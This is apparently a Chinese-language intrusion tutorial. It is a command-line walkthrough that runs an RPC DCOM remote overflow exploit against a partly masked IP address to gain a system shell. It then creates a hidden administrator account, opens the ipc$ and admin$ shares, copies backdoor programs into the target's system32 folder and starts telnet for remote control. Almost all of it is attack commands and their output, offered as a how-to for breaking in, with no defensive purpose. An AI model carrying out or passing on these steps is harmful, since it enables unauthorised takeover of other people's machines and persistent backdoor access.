一步一个脚印，学好入侵

核心提示： F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0RPC DCOM remote expl01t - .:[oc192.us]:. SecurityComplied and recorrected by Expl01t www.longker.com[

F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0　

RPC DCOM remote expl01t - .:[oc192.us]:. Security　

Complied and recorrected by Expl01t www.longker.com　

[+] Resolving host..　

[+] Done.　

[+] Expl01ting....Just wait......　

等到出现，说明溢出成功　

c:/winnt/system32>　

接着我们建立用户　

c:/winnt/system32>net user blueye$ 1111 /add　

命令成功完成。　

把用户添加成超级管理员　

c:/winnt/system32>net localgroup administrators blueye$ /add　

命令成功完成。　

看看共享开了没有没有的话把共享开开　

c:/winnt/system32>net share　

清单是空的。　

c:/winnt/system32>net share ipc$　

命令成功完成。　

c:/winnt/system32>net share admin$　

命令成功完成。　

到这里我们入侵告一段落　

[ 建 立 IPC$ 连 接 ，也可以使用tftp上传 ，先和对方建立连接]　

F:/hack>net use //211.217.50.xx/ipc$ "1111" /user:blueye$　

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]　

F:/hack>copy d:/inject.exe //211.217.50.xx/admin$/system32　

F:/hack>copy d:/tback.dll //211.217.50.xx/admin$/system32　

然后运行后门程序，我们可以使用at命令。但是有的机器把at明令禁止了，建议直接开起telnet　

使用opentelnet.exe 关闭开启的telnet使用resumetelnet //ip user password　

如果忘记开共享可以使用脚本开启telnet来开共享，用法:　

cscript telnet.vbe ip user password null port (null是验证方式)